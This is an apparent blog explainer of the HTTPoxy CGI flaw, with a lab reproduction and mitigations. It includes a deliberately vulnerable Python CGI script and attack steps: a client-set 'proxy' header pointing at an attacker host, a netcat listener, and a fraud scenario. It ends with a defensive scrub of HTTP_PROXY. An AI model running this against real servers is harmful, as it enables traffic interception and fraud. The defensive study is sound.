HTTPoxy vulnerability affecting CGI Applications

HTTPoxy

There’s a new vulnerability that comes with its own website [HTTPoxy.org] and a logo. The complete description is available on the official website; here I’m going to walk you through it and give you some practical examples of abuse cases. I’ve also developed a tool that you can run on your servers which tells you if you’re vulnerable or not.

What is HTTPoxy and how does it work?

HTTPoxy is the name of a vulnerability affecting CGI-based applications. It can affect PHP, Go, Python, Perl, etc. Web servers running in a CGI or CGI-like context may assign the value of a client’s Proxy request header to the internal HTTP_PROXY environment variable. The vulnerable behavior is the result of a naming convention for meta-variables, defined in RFC 3876, which leads to a name collision: “The HTTP header field name is converted to upper case, has all occurrences of "-" replaced with "_" and has "HTTP_" prepended to give the meta-variable name.”

As mentioned above, client-supplied headers are placed into environment variables in a CGI context in the form HTTP_header. Hence, if a client sets the “proxy” header to an IP address, say 10.10.10.10, the CGI engine sets the HTTP_PROXY environment variable to that address, and any part of the script that uses this environment variable will use 10.10.10.10 as its proxy, giving the attacker the ability to MITM the traffic.

Remaking the scenario

To get a better understanding of this vulnerability, I remade the scenario in my lab.

This is the scenario:

  1. We set up an Apache web server under Linux and wrote a simple Python script to serve as our CGI application.
  2. We started netcat listening on port 5555 somewhere on the internet to serve as the attacker-controlled proxy server.
  3. The attacker opens our CGI script at http://10.211.55.10/cgi-bin/test.py and uses Tamper Data to add the proxy header, setting it to the address of his proxy server: “proxy” : “http://[attackers ip]:5555”
  4. The CGI script on the server happens to make a request to fetch a page, and once this proxy is set its traffic is redirected to the attacker’s server, giving him the ability to MITM the server’s request.

1. CGI Script

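#!/usr/bin/python
# Deliberately vulnerable CGI script (Python 2) used in the lab

import os
import requests

# CGI response header; the trailing \r\n plus print's newline ends the header block
print "Content-Type: text/html\r\n"
print "Testing HTTPoxy"

# Under CGI, a client-supplied "Proxy" header shows up here as HTTP_PROXY
print os.environ.get("HTTP_PROXY")

# requests reads its proxy settings from the environment.
# www.google.com could be some internal API fetching important information
response = requests.get("http://www.google.com")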

2. NetCat as attacker’s proxy

The attacker runs nc -l -k 5555 to listen for connections from the vulnerable web server.

3. Attacker using Tamper Data to add “proxy” header

[Image: proxy header]

4. Attacker’s proxy intercepting webserver’s requests

[Image: netcat as proxy]

How could this vulnerability actually be exploited?

Consider a financial application which takes users’ requests for transactions, fetches their current balance via an internal HTTP API and transfers the money if the balance is sufficient.

An attacker exploiting the http_proxy vulnerability can take control of the requests going to that API, MITM them and send back his own response saying the balance is sufficient, forcing his requested transactions to complete without enough money in his account.

Am I Vulnerable?

Some of the major affected software:

  • Apache
  • NGINX/FastCGI
  • HAProxy
  • lighttpd
  • Microsoft IIS with PHP or CGI Framework (ASP/ASP.net Applications aren’t affected)
  • LiteSpeed web server

To fix this issue you have to use your web server’s specific mitigations, which basically remove or disable the http_proxy header. Since clients don’t send it in a normal scenario, there won’t be side effects.

To find fixes, search your web server’s website or use the links provided at HTTPoxy.org.
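
The name collision and an application-level scrub, as an added Python 3 example that is not part of the original post or of any web server's own code. It models the header-to-meta-variable rule quoted above and drops HTTP_PROXY when a CGI context is detected; the function names and the sample headers (including proxy.invalid) are constructed for illustration.

```python
import os

def cgi_meta_variable(header_name):
    """Apply the CGI naming rule: upper-case, '-' -> '_', prefix 'HTTP_'."""
    return "HTTP_" + header_name.upper().replace("-", "_")

def build_cgi_environ(request_headers, server_env):
    """Model what a CGI gateway does: server env plus one HTTP_* per header."""
    env = dict(server_env)
    env["GATEWAY_INTERFACE"] = "CGI/1.1"
    for name, value in request_headers.items():
        env[cgi_meta_variable(name)] = value
    return env

def effective_http_proxy(env):
    """The value a proxy-aware HTTP client reading the environment would see."""
    return env.get("http_proxy") or env.get("HTTP_PROXY")

def scrub_proxy(env):
    """Remove HTTP_PROXY when running under CGI; return what was removed.

    Outside CGI (no GATEWAY_INTERFACE / REQUEST_METHOD) the variable is an
    operator setting, not client input, so it is left alone.
    """
    if "GATEWAY_INTERFACE" in env or "REQUEST_METHOD" in env:
        return env.pop("HTTP_PROXY", None)
    return None

# Constructed sample request headers (not captured traffic).
SAMPLE_HEADERS = {
    "Host": "10.211.55.10",
    "User-Agent": "demo-client",
    "Proxy": "http://proxy.invalid:5555",
}

def demo():
    env = build_cgi_environ(SAMPLE_HEADERS, {"REQUEST_METHOD": "GET"})
    before = effective_http_proxy(env)   # client-controlled value
    removed = scrub_proxy(env)           # what the scrub took out
    after = effective_http_proxy(env)    # nothing left for the client to use
    return before, removed, after

if __name__ == "__main__":
    print(demo())
    # In a real CGI script: call scrub_proxy(os.environ) before any
    # outbound HTTP request is made.
```

The scrub belongs at the very top of the script, and it complements the web server mitigation rather than replacing it.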